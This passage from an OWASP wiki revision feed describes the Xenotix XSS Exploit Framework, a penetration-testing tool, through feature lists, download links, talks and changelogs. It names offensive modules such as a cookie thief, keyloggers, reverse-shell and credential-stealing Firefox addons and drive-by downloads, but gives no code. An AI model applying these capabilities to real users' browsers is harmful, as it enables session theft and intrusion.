*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]&lt;br /&gt;
SHA256: 68096d574aacf51cea46708d473d5c6b13d3b5039c8f3587d2325c9bdefdcbc1&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6.1 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip | MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
*Version 6.1 Mirror: https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view | MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.2 Changes==&lt;br /&gt;
* Added more Payloads&lt;br /&gt;
* New Info Gathering Module HSTS+CSP Visited Sites Detection&lt;br /&gt;
* Bug Fix Hash Calculator&lt;br /&gt;
* Bug Fix - Get Fuzzer&lt;br /&gt;
* Bug Fix IP2Geolocation&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]	&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=211443</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=211443"/>
				<updated>2016-03-19T06:43:08Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: v6.1 update&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]&lt;br /&gt;
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [19 Mar 2014] Xenotix XSS Exploit Framework V6.2 is Released&lt;br /&gt;
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
** HSTS+ CSP Visited Sites Grabber&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]&lt;br /&gt;
SHA256: 68096d574aacf51cea46708d473d5c6b13d3b5039c8f3587d2325c9bdefdcbc1&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6.1 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip | MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
*Version 6.1 Mirror: https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view | MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
